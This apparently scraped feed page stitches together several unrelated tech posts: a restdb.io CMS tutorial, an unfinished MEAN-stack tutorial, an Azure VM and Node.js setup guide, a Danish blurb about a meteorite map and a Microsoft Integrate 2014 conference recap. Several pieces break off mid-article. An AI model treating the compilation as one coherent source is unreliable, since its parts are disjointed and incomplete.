          A more practical option is to outsource your database and that's exactly the service restdb.io provides. They manage the tricky data storage shenanigans, leaving you to concentrate on more urgent development tasks.

          restdb.io: the Basics

          restdb.io is a plug and play cloud NoSQL database. It will be immediately familiar to anyone with MongoDB experience. The primary differences:

          • there's no need to manage your installation, storage or backups
          • you can define a data structure schema in restdb.io
          • data fields can have relationships with other fields in other collections
          • there's no need to define indexes
          • data can be queried and updated through a REST API authenticated by HTTP or Auth0/JWT tokens
          • queries and updates are sent and received in JSON format
          • there are tools to enter, view and export data in various formats
          • it supports some interesting bonus features such as codehooks, email, web form generation, websites, realtime messaging, and more.

          A free account allows you to assess the service with no obligation. Paid plans offer additional storage space, query throughput, developer accounts and MongoDB integration.

          In the following sections I'll describe how to:

          1. configure a new database and enter data
          2. use that data to render a set web pages hosted on restdb.io, and
          3. use the API to provide a search facility for content editors.

          Step 1: Create a New Database

          After signing up with a Google, Facebook or email account, you can create a new empty database. This generates a new API endpoint URL at yourdbname.restdb.io:

          create a new database

          Step 2: Create a New Collection

          A database contains one or more collections for storing data. These are analogous to SQL database tables. Collections contain "documents" which are analogous to SQL database records (table rows).

          The restdb.io interface offers two modes:

          1. Standard mode shows the available collections and allows you to insert and modify data.
          2. Developer mode allows you to create and configure collections.

          enter developer mode

          Enter Developer Mode (top-right of screen) and click the Add Collection button.

          create a new collection

          A collection requires a unique name (I've used "content") and an optional description and icon. Hit Save to return to your database overview. The "content" collection will appear in the list along with several other non-editable system collections.

          Alternatively, data can be imported from Excel, CSV or JSON files to create a collection by hitting Import in the standard view.

          Step 3: Define Fields

          Staying in Developer Mode, click the "content" collection and choose the Fields tab. Click Add Fields to add and configure new fields which classify the data in the collection.

          create fields

          Each collection document will sore data about a single page in the database-driven website. I've added five fields:

          • slug - a text field for the page path URL
          • title - a text field for the page title
          • body - a special markdown text field for the page content
          • image - a special image field which permits any number of uploaded images (which are also stored on the restdb.io system)
          • published - boolean value which must be true for pages to be publicly visible.

          Step 4: Add Documents

          Documents can be added to a collection in either standard or developer mode (or via the API). Create a few documents with typical page content:

          create documents

          The slug should be empty for the home page.

          Step 5: Create a Database-Driven Website (Optional)

          restdb.io provides an interesting feature which can create and host a database-driven website using data documents in a collection.

          The site is hosted at www-yourdbname.restdb.io but you can point any domain at the pages. For instructions, click Settings from the Database list or at the bottom of the left-hand panel then click the Webhosting tab.

          To create the website, Pages must be configured in Developer Mode which define templates to view the content. Templates contain a code snippet which sets:

          1. the context - a query which locates the correct document in a collection, and
          2. the HTML - a structure which uses handlebars template syntax to insert content into appropriate elements.

          Click Add Page to create a page. Name it the special name /:slug - this means the template will apply to any URL other than the home page (which does not have a slug). Hit Save and return to the page list, then click the /:slug entry to edit.

          Switch to the Settings tab and ensure text/html is entered as the Content Type and Publish is checked before hitting Update:

          create page

          Now switch to the Code for "/:slug" tab. Enter the context code at the top of the editor:

          {{#context}}
          {
            "docs": {
              "collection": "content",
              "query": {
                "slug": "{{pathparams.slug}}",
                "published": true
              }
            }
          }
          {{/context}}
          

          This defines a query so the template can access a specific document from our content collection. In this case, we're fetching the published document which matches the slug passed on the URL.

          All restdb.io queries return an array of objects. If no document is returned, the docs array will be empty so we can add code to return that the page is not available immediately below the context:

          <!doctype html>
          {{#unless docs.[0]}}
            <html>
            <body>
              <h1>Page not available</h1>
              <p>Sorry, this page cannot be viewed. Please return later.</p>
            </body>
            </html>
          {{/unless}}
          

          Below this, we can code the template which slots the title, body and image fields into appropriate HTML elements:

          {{#with docs.[0]}}
            <html>
            <head>
              <meta charset="utf-8">
              <title>{{title}}</title>
              <meta name="viewport" content="width=device-width,initial-scale=1">
              <style>
                body {
                  font-family: sans-serif;
                  font-size: 100%;
                  color: #333;
                  background-color: #fff;
                  max-width: 40em;
                  padding: 0 2em;
                  margin: 1em auto;
                }
              </style>
            </head>
            <body>
              <header>
                {{#each image}}
                  <img src="https://sitepoint-fbbf.restdb.io/media/{{this}}" alt="image" />
                {{/each}}
          
                <h1>{{title}}</h1>
              </header>
              <main>
                {{markdown body}}
          
                <p><a href="/">Return to the home page...</a></p>
              </main>
            </body>
            </html>
          {{/with}}
          

          Note our markdown body field must be rendered with a markdown handler.

          Save the code with Ctrl|Cmd + S or by returning to the Settings tab and hitting Update.

          The /:slug page template will apply to all our content collection — except for the home page, because that does not have a slug! To render the home page, create a New Page with the name home with identical settings and content. You may want to tweak the template for home-page-specific content.

          Once saved, you can access your site from https://www-yourdbname.restdb.io/. I've created a very simple three-page site at https://www-sitepoint-fbbf.restdb.io/.

          For more information about restdb.io page hosting, refer to:

          Step 6: API Queries

          Creating a site to display your data may be useful, but you'll eventually want to build an application which queries and manipulates information.

          restdb.io's REST API provides endpoints controlled via HTTP:

          • HTTP GET requests retrieve data from a collection
          • HTTP POST requests create new documents in a collection
          • HTTP PUT requests update documents in a collection
          • HTTP PATCH requests update one or more properties in a document in a collection
          • HTTP DELETE requests delete documents from a collection

          There are a number of APIs for handling uploaded media files, database meta data and mail but the one you'll use most often is for collections. The API URL is:

          https://yourdbname.restdb.io/rest/collection-name/

          The URL for my "content" collection is therefore:

          https://sitepoint-fbbf.restdb.io/rest/content/
          

          Queries are passed to this URL as a JSON-encoded querystring parameter named q, e.g. fetch all published articles in the collection:

          https://sitepoint-fbbf.restdb.io/rest/content/q={"published": true}
          

          However, this query will fail without an API key passed in the x-apikey HTTP header. A full-access API key is provided by default but it's advisable to create keys which are limited to specific actions. From the database Settings, API tab:

          create a new database

          Click Add New to create a new key. The one I created here is limited to GET (query) requests on the content collection only. You should create a similarly restricted key if you will be using client-side JavaScript Ajax code since the string will be visible in the code.

          It's now possible to build a standalone JavaScript query handler (ES5 has been used to ensure cross-browser compatibility without a pre-compile step!):

          // restdb.io query handler
          var restDB = (function() {
          
            // configure for your own DB
            var 
              api = 'https://sitepoint-fbbf.restdb.io/rest/',
              APIkey = '597dd2c7a63f5e835a5df8c4';
          
            // query the database
            function query(url, callback) {
          
              var timeout, xhr = new XMLHttpRequest();
          
              // set URL and headers
              xhr.open('GET', api + url);
              xhr.setRequestHeader('x-apikey', APIkey);
              xhr.setRequestHeader('content-type', 'application/json');
              xhr.setRequestHeader('cache-control', 'no-cache');
          
              // response handler
              xhr.onreadystatechange = function() {
                if (xhr.readyState !== 4) return;
                var err = (xhr.status !== 200), data = null;
                clearTimeout(timeout);
                if (!err) {
                  try {
                    data = JSON.parse(xhr.response);
                  }
                  catch(e) {
                    err = true;
                    data = xhr.response || null;
                  }
                }
                callback(err, data);
              };
          
              // timeout
              timeout = setTimeout(function() {
                xhr.abort();
                callback(true, null);
              }, 10000);
          
              // start call
              xhr.send();
            }
          
            // public query method
            return {
              query: query
            };
          
          })();
          

          This code passes queries to the restdb.io API endpoint and sets the appropriate HTTP headers including x-apikey for the API key. It times out if the response takes longer than ten seconds. A callback function is passed an error and any returned data as a native object. For example:

          // run a query
          restDB.query(
            '/content?q={"published":true}',
            function(err, data) {
              // success!
              if (!err) console.log(data);
            }
          );
          

          The console will output an array of documents from the content collection, e.g.

          [
            {
              _id: "1111111111111111",
              slug: "",
              title: "Home page",
              body: "page content...",
              image: [],
              published: true
            },
            {
              _id: "22222222222222222",
              slug: "page-two",
              title: "Page Two",
              body: "page content...",
              image: [],
              published: true
            },
            {
              _id: "33333333333333333",
              slug: "page-three",
              title: "Another page",
              body: "page content...",
              image: [],
              published: true
            }
          ]
          

          The API can be called from any language which can make an HTTP request. restdb.io provides examples for cURL, jQuery $.ajax, JavaScript XMLHttpRequest, NodeJS, Python, PHP, Java, C#, Objective-C and Swift.

          I've created a simple example at Codepen.io which allows you to search for strings in the title and body fields and displays the results:

          See the Pen restdb.io query by SitePoint (@SitePoint) on CodePen.

          It passes the following query:

          { "$or": [
            { "title": {"$regex": "searchstring"} }, 
            { "body":  {"$regex": "searchstring"} }
          ]}
          

          where searchstring is the search text entered by the user.

          An additional h querystring parameter limits the returned fields to just the slug, title and published flag:

          {
            "$fields": {
              "slug": 1,
              "title": 1,
              "published": 1
            }
          }
          

          Further information:

          Step 7: Build Your Own CMS

          A few steps were required to create a database-driven website and a simple search facility. You could edit pages directly using restdb.io's user interface but it would be possible to build a bespoke CMS to manipulate the content. It would require:

          1. A new restdb.io API key (or change the existing one) to have appropriate GET, POST, PUT, PATCH and DELETE access to the content collection.
          2. A user interface to browse or search for pages (the one above could be a good starting point).
          3. A process to start a new page or GET existing content and place it in an editable form.
          4. Processes to add, update or delete pages using the appropriate HTTP methods.

          The editing system should run on a restricted device or behind a login to ensure only authenticated users can access. Take care not to reveal your restdb.io API key if using client-side code!

          Further information:

          Try restdb.io Today!

          This article uses restdb.io to build a rudimentary CMS, but the service is suitable for any project which requires data storage. The REST API can be accessed from any language or framework which makes it ideal for applications with multiple interfaces, e.g. a web and native mobile view.

          restdb.io provides a practical alternative to managing your own database software installation. It's simple to use, fast, powerful, highly scalable and considerably less expensive than hiring a database expert! Your application hosting costs will also reduce since all data is securely stored and backed-up on the restdb.io servers.

          Finally, restdb.io makes you more productive. You can concentrate on the main application because data storage no longer causes concerns for you and your team.

          Start building your restdb.io database today and let us know how you get on!

          Continue reading %How to Get Started With restdb.io and Create a Simple CMS%


                    MEAN Stack: Developing an app with Angular 2+ and the Angular CLI        

          The MEAN stack comprises of advanced technologies used to develop both the server-side and the client-side of a web application in a JavaScript environment. The components of the MEAN stack include the MongoDB database, Express.js (a web framework), Angular (a front-end framework), and the Node.js runtime environment. Taking control of the MEAN stack and familiarizing different JavaScript technologies during the process will help you in becoming a full-stack JavaScript developer.

          JavaScript’s sphere of influence has dramatically grown over the years and with that growth, there is an ongoing desire to keep up with the latest trends in programming. New technologies have emerged and existing technologies have been rewritten from the ground up (I am looking at you, Angular).

          This tutorial intends to create the MEAN application from scratch and serve as an update to the original MEAN stack tutorial. If you are familiar with MEAN and want to get started with the coding, you can skip to the overview section.

          Introduction to MEAN Stack

          Node.js - Node.js is a server-side runtime environment built on top of Chrome's V8 JavaScript engine. Node.js is based on an event-driven architecture that runs on a single thread and a non-blocking IO. These design choices allow you to build real-time web applications in JavaScript that scale well.

          Express.js - Express is a minimalistic yet robust web application framework for Node.js. Express.js uses middleware functions to handle HTTP requests and then either return a response or pass on the parameters to another middleware. Application-level, Router-level, and Error-handling middlewares are available in Express.js.

          MongoDB - MongoDB is a document-oriented database program where the documents are stored in a flexible JSON-like format. Being an NOSQL database program, MongoDB relieves you from the tabular jargon of the relational database.

          Angular - Angular is an application framework developed by Google for building interactive Single Page Applications. Angular, originally AngularJS, was rewritten from scratch to shift to a Component based architecture from the age old MVC framework. Angular recommends the use of TypeScript which, in my opinion, is a good idea because it enhances the development work-flow.

          Now that we are acquainted with the pieces of the MEAN puzzle, let’s see how we can fit them together, shall we?

          Overview

          Here is a high-level overview of our application.

          High-level overview of our MEAN stack application

          We will be building an Awesome Bucket List Application from the ground up without using any boilerplate template. The front-end will include a form that accepts your bucket list items and a view that updates and renders the whole bucket list in real-time.

          Any update to the view will be interpreted as an event and this will initiate an HTTP request. The server will process the request, update/fetch the MongoDB if necessary, and then return a JSON object. The front-end will use this to update our view. By the end of this tutorial, you should have a bucket list application that looks like this.

          Screenshot of the bucket list application that we are going to build

          The entire code for the Bucket List application is available on GitHub.

          Prerequisites

          First things first, you need to have Node.js and MongoDB installed to get started. If you are entirely new to Node, I would recommend reading the Beginner’s Guide to Node to get things rolling. Likewise, setting up MongoDB is easy and you can check out their documentation for installation instructions specific to your platform.

          $ node -v
          # v8.0.0
          

          Start the mongo daemon service using the command.

          sudo service mongod start
          

          To install the latest version of Angular, I would recommend using Angular-CLI. It offers everything you need to build and deploy your angular application. If you are not familiar with the Angular CLI yet, make sure you check out The Ultimate Angular CLI Reference.

          npm install -g @angular/cli
          

          Create a new directory for our bucket list project. That’s where all your code will go, both the front end and the back end.

          mkdir awesome-bucketlist
          cd awesome-bucketlist
          

          Creating the Backend Using Express.js and MongoDB

          Express doesn’t impose any structural constraints on your web application. You can place the entire application code in a single file and get it to work, theoretically. However, your code base would be a complete mess. Instead, we are going to do this the MVC (Model, View, and Controller) way (minus the view part).

          MVC is an architectural pattern that separates your models (the back-end) and views (the UI) from the controller (everything in between), hence MVC. Since Angular will take care of the front-end for us, we will have three directories, one for models and another one for controllers, and a public directory where we will place the compiled angular code.

          In addition to this, we will create an app.js file that will serve as the entry point for running the Express server.

          Directory structure of MEAN stack

          Although using a model and controller architecture to build something trivial like our bucket list application might seem essentially unnecessary, this will be helpful in building apps that are easier to maintain and refactor.

          Initializing npm

          We’re missing a package.json file for our back end. Type in npm init and, after you’ve answered the questions, you should have a package.json made for you.

          We will declare our dependencies inside the package.json file. For this project we will need the following modules.

          • express: Express module for the web server
          • mongoose: A popular library for MongoDB
          • bodyparser: Parses the body of the incoming requests and makes it available under req.body
          • cors: CORS middleware enables cross-origin access control to our web server.

          I’ve also added a start script so that we can start our server using npm start.

          {
            "name": "awesome-bucketlist",
            "version": "1.0.0",
            "description": "A simple bucketlist app using MEAN stack",
            "main": "app.js",
            "scripts": {
              "start": "node app"
            },
          
          //The ~ is used to match the most recent minor version (without any breaking changes)
          
           "dependencies": {
              "express": "~4.15.3",
              "mongoose": "~4.11.0",
              "cors": "~2.8.3",
              "body-parser": "~1.17.2"
            },
          
            "author": "",
            "license": "ISC"
          }
          

          Now run npm install and that should take care of installing the dependencies.

          Filling in app.js

          First, we require all of the dependencies that we installed in the previous step.

          // We will declare all our dependencies here
          const express = require('express');
          const path = require('path');
          const bodyParser = require('body-parser');
          const cors = require('cors');
          const mongoose = require('mongoose');
          
          //Initialize our app variable
          const app = express();
          
          //Declaring Port
          const port = 3000;
          

          As you can see, we’ve also initialized the app variable and declared the port number. The app object gets instantiated on the creation of the Express web server. We can now load middleware into our Express server by specifying them with app.use().

          //Middleware for CORS
          app.use(cors());
          
          //Middleware for bodyparsing using both json and urlencoding
          app.use(bodyParser.urlencoded({extended:true}));
          app.use(bodyParser.json());
          
          /*express.static is a built in middleware function to serve static files.
           We are telling express server public folder is the place to look for the static files
          */
          app.use(express.static(path.join(__dirname, 'public')));
          

          The app object can understand routes too.

          app.get('/', (req,res) => {
              res.send("Invalid page");
          })
          

          Here, the get method invoked on the app corresponds to the GET HTTP method. It takes two parameters, the first being the path or route for which the middleware function should be applied.

          The second is the actual middleware itself and it typically takes three arguments: The req argument corresponds to the HTTP Request; the res argument corresponds to the HTTP Response; and next is an optional callback argument that should be invoked if there are other subsequent middlewares that follow this one. We haven’t used next here since the res.send() ends the request-response cycle.

          Add this line towards the end to make our app listen to the port that we had declared earlier.

          //Listen to port 3000
          app.listen(port, () => {
              console.log(`Starting the server at port ${port}`);
          });
          

          npm start should get our basic server up and running.

          By default, npm doesn’t monitor your files/directories for any changes and you have to manually restart the server every time you’ve updated your code. I recommend using nodemon to monitor your files and automatically restart the server when any changes are detected. If you don't explicitly state which script to run, nodemon will run the file associated with the main property in your package.json.

          npm install -g nodemon
          nodemon
          

          We are nearly done with our app.js file. What’s left to do? We need to

          1. Connect our server to the database.
          2. Create a controller which we can then import to our app.js.

          Setting up mongoose

          Setting up and connecting a database is straightforward with MongoDB. First, create a config directory and a file named database.js to store our configuration data. Export the database URI using module.exports.

          // 27017 is the default port number.  
          module.exports = {
              database: 'mongodb://localhost:27017/bucketlist'
          }
          

          And establish a connection with the database in app.js using mongoose.connect().

          // Connect mongoose to our database
          const config = require('./config/database');
          mongoose.connect(config.database);
          

          "But what about creating the bucket list database?", you may ask. The database will be created automatically when you insert a document into a new collection on that database.

          Working on the controller and the model

          Now let’s move on to create our bucket list controller. Create a bucketlist.jsfile inside the controller directory. We also need to route all the /bucketlist requests to our bucketlist controller (in app.js).

          const bucketlist = require('./controllers/bucketlist');
          
          //Routing all HTTP requests to /bucketlist to bucketlist controller
          app.use('/bucketlist',bucketlist);
          

          Here is the final version of our app.js file.

          Continue reading %MEAN Stack: Developing an app with Angular 2+ and the Angular CLI%


                    Comment on Overriding GNU Make SHELL variable for massive parallel make by inodb (@inodb)        
          Hi, nice post. I can't really seem to find any information on other people using GXP. Any idea why? Yours is the only post I can find that even mentions it and it is from 2008. It seems to work quite well for me. Great if you, like me, write bioinformatic pipelines in GNU make. Any thoughts on the reason for using daemons? Handling interrupts perhaps?
                    Build a 3-node mongodb cluster using puppet (for use with High Availability Graylog in this case)        

          One of the core components to a Graylog installation in MongoDB. Quite possibly the worst database ever to grace the planet :)

          Hopefully, from a Graylog prospective, MongoDB will disappear from the solution soon.

          Anyway, from an architecture prospective, we want to use a highly available Graylog deployment aka Graylog HA.… Read the rest

          The post Build a 3-node mongodb cluster using puppet (for use with High Availability Graylog in this case) appeared first on vmware admins.


                    Interaktivt kort over verdens meteoritter        
          Sjovt kort over de sidste flere tusinde års meteritnedslag på Jorden. De sidste uges fokus på meteoritnedslaget i Rusland har fået Javier de la Torre der er medgrundlægger af geoteknikfirmaerne Vizzuality og CartoDB til at lave et interaktivt kort over verdens meteoritnedslag. Her kan man se ...
                    Twoway databinding to a MongoDB collection in WPF        
          I’ll show how to have a two-way databinding between a templated listbox and a MongoDB collection. I’m finally got around toying with MongoDb.What I’ll show next might not be the most correct way, but it works for me. Setup I have a Listview defined in XAML with a datatemplate: I created an Entity class (can be […]
                    Setup MongoDB in Node.js Azure VM with attached Data Disk as DB storage.        

          To set up Node.js on Azure VM ckeckout the blog Create Azure Virtual Machine and Setup Node.js. So now moving forward, lets start with attaching a Data Disk to your previously set up Azure Virtual Machine.

          Attach a Data Disk to Azure Virtual Machine :

          1. In the left navigational bar select VIRTUAL MACHINES in Management Portal.

          Now at bottom-left corner select +New.

          2. For basic needs select QUICK CREATE.

          1. Give a name to your VM in the DNS NAME.
          2. Select Ubuntu Server image(14.04 LTS will be ideal).
          3. Based on your performance needs, select the SIZE of VM.
          4. Azure by default, creates USER NAME as azureuser.
          5. Next is PASSWORD (No need to describe what has to be done here).
          6. Last but quite important is REGION/AFFINITY GROUP. If you have created any Affinity Group and want your VM to be in that Group select it or select the region based on your location.
          7. As soon as you click Create A Virtual Machine Azure will create it in few moments.

          If you are planning to create a cluster of VM with better latency between them, then first create a Virtual Network and later while creating VMs use FROM GALLERY and add the VN you want to use in REGION/AFFINITY GROUP/VIRTUAL NETWORK option. You can give desirable name to VM in FROM GALLERY mode.

          Access your Virtual Machine :

          For users operating from Windows OS preferred SSH client is PuTTY.
          Whereas users operating from Linux OS might want to use SSH client such as OpenSSH.

          Get your Host Name and Port information from the Management Portal. You can get all the information about your VM from the dashboard of the virtual machine. Click the virtual machine name and find your SSH Details.

          Command to connect from Linux after having installed OpenSSH.

          # ssh user_name@DNS_NAME
          

          Where DNS_NAME is your host-name.cloudapp.net . Then enter your password. (Well now that you are on your VM feel free to play around it like any other Ubuntu Machine).

          Azure by default opens port 22 for ssh and you can configure rest as per your need in ENDPOINTS in Management Portal.

          Set up Node.js:

          Node.js is built up on a Javascript runtime platform for building fast network applications. You can design network applications with both the front-end and the back-end utilizing Javascript within the same system providing more consistency. To get Node.js in your machine use the apt package manager.

          sudo apt-get update
          sudo apt-get install nodejs
          

          Well to move on you will also want to install npm that is node.js package manager.

          sudo apt-get install npm
          

          This will enable you to easily install and manage the modules and packages to use with Node.js.

          In Ubuntu the executable is called nodejs instead of node because of conflict with another package node.

          To get the Node.js version of your choice you can also install it through PPA (personal package archive) of perhaps NVM (Node.js version manager) for more flexibility.


                    Integrate 2014 Recap        

          I have recently made it home from a great week at Redmond’s Microsoft campus where I attended the Integrate 2014 event.  I want to take this opportunity to thank both Microsoft and BizTalk360 for being the lead sponsors and organizers of the event.

          image image

          I also want to call out to the other sponsors as these events typically do not take place without this type of support.  I think it also a testament of just how deep Microsoft’s partner ecosystem really is and it was a pleasure to interact with you over the course of the week.

          image image image image
          image image image image
          image image image image
          image image image image
          image image    

          Speaking at the event

          I want to thank Microsoft and BizTalk360 for inviting me to speak at this event. This was the first time that I have had the chance to present at Microsoft’s campus and it was an experience I don’t think I will ever forget.  I have been to Microsoft campus probably around 20 times for various events but have never had the opportunity to present.  It was a pretty easy decision.

          One of the best parts of being involved in the Microsoft MVP program is the international network that you develop. Many of us have been in the program for several years and really value each other’s experience and expertise.  Whenever we get together, we often compare notes and talk about the industry.  We had a great conversation about the competitive landscape.  We also discussed the way that products are being sold with a lot of buzzwords and marketecture.  People were starting to get caught up in this instead of focusing on some of the fundamental requirements.  Much like any project should be based upon a formal, methodical, requirements driven approach, so should buying an integration platform.

          These concepts introduced the idea of developing a whitepaper where we would identify requirements “if I was buying” an integration platform. Joining me on this journey was Michael Stephenson and Steef-Jan Wiggers.  We focused on both functional and nonfunctional requirements. We also took this opportunity to rank the Microsoft platform, which includes BizTalk Server, BizTalk Services, Azure Service Bus and Azure API Management.  Our ranking was based upon experiences with these tools and how our generic integration requirements could be met by the Microsoft stack. This whitepaper is available on the BizTalk360 site for free.  Whether your are a partner, system integrator, integration consultant or customer you are welcome to use and alter as you see fit.  If you feel we have missed some requirements, you are encouraged to reach out to us.  We are already planning a 1.1 version of this document to address some of the recent announcements from the Integrate event.

          My presentation focused on 10 of the different requirements that were introduced in the paper.  I also included a ‘Legacy Modernization’ demo that highlights Microsoft’s ability to deliver on some of the requirements that were discussed in the whitepaper.  This session was recorded and will be published on the BizTalk360 site in the near future.

           

          Recap

          Disclaimer: What I am about to discuss is all based upon public knowledge that was communicated during the event.  I have been careful to ensure what is described is accurate to the best of my knowledge.  It was a fast and furious 3 days with information moving at warp speed. I have also included some of my own opinions which may or may not be inline with Microsoft’s way of thinking.   For some additional perspectives, I encourage you to check out the following blog posts from the past week:

          Event Buildup

          There was a lot of build up to this event, with Integration MVPs seeing some early demos there was cause for a lot of excitement.  This spilled over to twitter where @CrazyBizTalk posted this prior to the event kicking off.  The poster(I know who you are Smile ) was correct, there has never been so much activity on twitter related to Microsoft Integration. Feel free to check out the timeline for yourself here.

          Embedded image permalink

          Picture Source @CrazyBizTalk

          Keynote

          The ever so popular Scott Guthrie or otherwise known as “Scott Gu” kicked off the Integrate 2014 event.  Scott is the EVP of Microsoft’s Cloud and Enterprise groups.  He provided a broad update on the Azure platform describing all of the recent investments that have been rolled out.

          Picture Source @SamVanhoutte

          Embedded image permalink

          Some of the more impressive points that Scott made about Azure include:

          • Azure Active Directory supports identity federation with 2342 SaaS platforms
          • Microsoft Azure is the only cloud provider in all 4 Gartner magic quadrants
          • Microsoft Azure provides the largest VMs in the cloud known as ‘G’ Machines (for Godzilla).  These VMs support 32 cores, 448 GB of Ram and 6500 GB of SSD Storage
          • Microsoft is adding 10 000+ customers per week to Microsoft Azure

          For some attendees, I sensed some confusion about why there would be so much emphasis on Microsoft Azure. In hindsight, it makes a lot of sense.  Scott was really setting the stage for what would be come a conference that focused on a cohesive Azure platform where BizTalk becomes one of the center pieces.

          Embedded image permalink

          Picture Source @gintveld

          A Microservices platform is born

          Next up was Bill Staples.  Bill is the General Manager for the Azure Application Platform or what is also known as “Azure App Platform”.  Azure App Platform is the foundational ‘fabric’ that currently enables a lot of Azure innovation and will fuel the next generation integration tools for Microsoft.

          A foundational component of Azure App Platform is App Containers.  These containers support many underlying Azure technologies that enable:

          • > 400k Apps Hosted
          • 300k Unique Customers
          • 120% Yearly Subscription Growth
          • 2 Billion Transactions daily

          Going forward we can expect BizTalk ‘capabilities’ to run inside these containers.  As you can see, I don’t think we will have any performance constraints.

          Embedded image permalink

          Picture Source @tomcanter

          Later in the session, it was disclosed that Azure App Platform will enable new BizTalk capabilities that will be available in the form of Microservices.  Microservices will enable the ability provide service composition in a really granular way.  We will have the ability to ‘chain’ these Microservices together inside of a browser(at design time), while enjoying the benefits of deploying to an enterprise platform that will provide message durability, tracking, management and analytics.

          I welcome this change.  The existing BizTalk platform is very reliable, robust, understood, and supported.  The challenge is that the BizTalk core, or engine, is over 10 years old and the integration landscape has evolved with BizTalk struggling to maintain pace.

          BizTalk capabilities exposed as Microservices puts Microsoft in the forefront of integration platforms leapfrogging many innovative competitors.  It allows Microsoft’s customers to enable transformational scenarios for their business.  Some of the Microservices that we can expect to be part of the platform include:

          • Workflow (BPM)
          • SaaS Connectivity
          • Rules (Engine)
          • Analytics
          • Mapping (Transforms)
          • Marketplace
          • API Management

          Embedded image permalink

          Picture Source @jeanpaulsmit

          We can also see where Microsoft is positioning BizTalk Microservices within this broader platform: 

          Embedded image permalink

          Picture Source @wearsy

          What is exciting about this is new platform is the role that BizTalk now plays in the broader platform.  For a while now, people have felt that BizTalk is that system that sits in the corner that people do not like to talk about.  Now, BizTalk is a key component within the App Platform that will enable many integration scenarios including new lightweight scenarios that has been challenging for BizTalk Server to support in the past.

          Whenever there is a new platform introduced like this, there is always the tendency to chase ‘shiny objects’ while ignoring some of the traditional capabilities of the existing platform that allowed you to gain the market share that you achieved.  Microsoft seems to have a good handle on this and has outlined the Fundamentals that they are using to build this new platform.  This was very encouraging to see. 

          Embedded image permalink

          Picture Source @wearsy

          At this point the room was buzzing.  Some people nodding their heads with delight(including myself), others struggling with the term Microservice, others concerned about existing requirements that they have and how they fit into the new world.  I will now break down some more details into the types of Microservices that we can expect to see in this new platform.

          Workflow Microservice

          One of the current gaps in Microsoft Azure BizTalk Services (MABS) is workflow.  In the following image we will see the workflow composer which is hosted inside a web browser.  Within this workflow we have the ability to expose it as a Microservice, but we also have the ability to pull in other Microservices such as a SaaS connector or a Rules Service.

          Embedded image permalink

          Picture Source @saravanamv

          On the right hand corner of this screen we can see some of these Microservices that we can pull in.  The picture is a little “grainy” but some of the items include:

          • Validation
          • Retrieve Employee Details (custom Microservice I suppose)
          • Rules
          • Custom Filter
          • Acme (custom Microservice I suppose)
          • Survey Monkey SaaS Connector)
          • Email (SaaS Connector)

          Embedded image permalink

          Picture Source (@mikaelsand)

          In the demo we were able to see a Workflow being triggered and the tracking information was made available in real time.  There are also an ability to schedule a workflow, run it manually or trigger it from another process.

          Early in the BizTalk days there as an attempt to involve Business Analysts in the development of Workflows (aka Orchestrations).  This model never really worked well as Visual Studio was just too developer focused, and Orchestration Designer for Business Analysts (ODBA) just didn’t have the required functionality for it to be a really good tool.  Microsoft is once again attempting to bring the Business Analyst into the solution by providing a simple to use tool which is hosted in a Web browser.  I always am a bit skeptical when companies try to enable these types of BA scenarios but I think that was primarily driven from workflows being defined in an IDE instead of a web browser.

          Embedded image permalink

          Picture Source @wearsy

          Once again, nice to see Microsoft focusing on key tenets that will drive their investment.  Also glad to see some of the traditional integration requirements being addressed including:

          • Persist State
          • Message Assurance
          • End to end tracking
          • Extensibility

          All too often some of these ‘new age’ platforms provide lightweight capabilities but neglect the features that integration developers need to support their business requirements. I don’t think this is the case with BizTalk going forward.

          Embedded image permalink

          Picture Source @wearsy

          SaaS Connectivity

          A gap that has existed in the BizTalk Server platform is SaaS connectivity.  While BizTalk does provide a WebHttp Adapter that can both expose and consume RESTful services, I don’t think it is enough (as I discussed in my talk).  I do feel that providing a great SaaS connector makes developers more productive and reduces the time to deliver projects is mandatory.  Delivering value quicker is one of the reasons why people buy Integration Platforms and subsequently having a library that contains full featured, stable connectors for SaaS platforms is increasingly becoming important.  I relate the concept of BizTalk SaaS connectors to Azure Active Directory Federations.  That platform boasts more than 2000+ ‘identity adapters”.  Why should it be any different for integration?

          The following image is a bit busy, but some of the Connector Microservices we can expect include:

          • Traditional Enterprise LOBs
          • Dynamics CRM Online
          • SAP SuccessFactors
          • Workday
          • SalesForce
          • HDInsight
          • Quickbooks
          • Yammer
          • Dynamics AX
          • Azure Mobile Services
          • Office 365
          • Coupa
          • OneDrive
          • SugarCRM
          • Informix
          • MongoDB
          • SQL Azure
          • BOX
          • Azure Blobs and Table
          • ….

          This list is just the beginning.  Check out the Marketplace section in this blog for more announcements.

          Embedded image permalink

          Picture Source @wearsy

          Rules Microservice

          Rules (Engines) are a component that shouldn’t be overlooked when evaluating Integration Platforms.  I have been at many organizations where ‘the middleware should not contain any business rules’.  While in principle, I do agree with this approach.  However, it is not always that easy. What do you do in situations where you are integrating COTS products that don’t allow you to customize?  Or there may be situations where you can customize, but do not want to as you may lose your customizations in a future upgrade. Enter a Rules platform.

          The BizTalk Server Rules Engine is a stable and good Rules Engine.  It does have some extensibility and can be called from outside BizTalk using .NET.  At times it has been criticized as being a bit heavy and difficult to maintained.  I really like where Microsoft is heading with its Microservice implementation that will expose “Rules as a Service” (RaaS?  - ok I will stop with that). This allows integration interfaces to leverage this Microservice but also allows other applications such as a Web or Mobile applications to leverage.  I think there will be endless opportunities for the broader Azure ecosystem to leverage this capability without introducing a lot of infrastructure.

          Embedded image permalink

          Picture Source @wearsy

          Once again, Microsoft is enabling non-developers to participate in this platform.  I think a Rules engine is a place where Business Analysts should participate.  I have seen this work on a recent project with Data Quality Services (DQS) and don’t see why this can’t transfer to the Rules Microservice.

          Embedded image permalink

          Picture Source @wearsy

           

          Data Transformation

          Another capability that will be exposed as a Microservice is Data Transformation (or mapping).  This is another capability that will exist in a Web browser.  If you look closely on the following image you will discover that we will continue to have what appears to be a functoid (or equivalent).

          Only time will tell if a Web Browser will provide the power to build complex Maps.  One thing that BizTalk Server is good at is dealing with large and complex maps.  The BizTalk mapping tools also provide a lot of extensibility through managed code and XSLT.  We will have to keep an eye on this as it further develops.

          image

           

          Analytics

          Within BizTalk Server we have Business Activity Monitoring (BAM).  It is a very powerful tool but has been accused of being too heavy at times. One of the benefits of leveraging the power of Azure is that we will be able to plug into all of those other investments being made in this area.

          While there was not a lot of specifics related to Analytics I think it is a pretty safe bet that Microsoft will be able to leverage their Power BI suite which is making giant waves in the industry.

          One interesting demo they did show us was using Azure to consume SalesForce data and display it into familiar Microsoft BI tools.

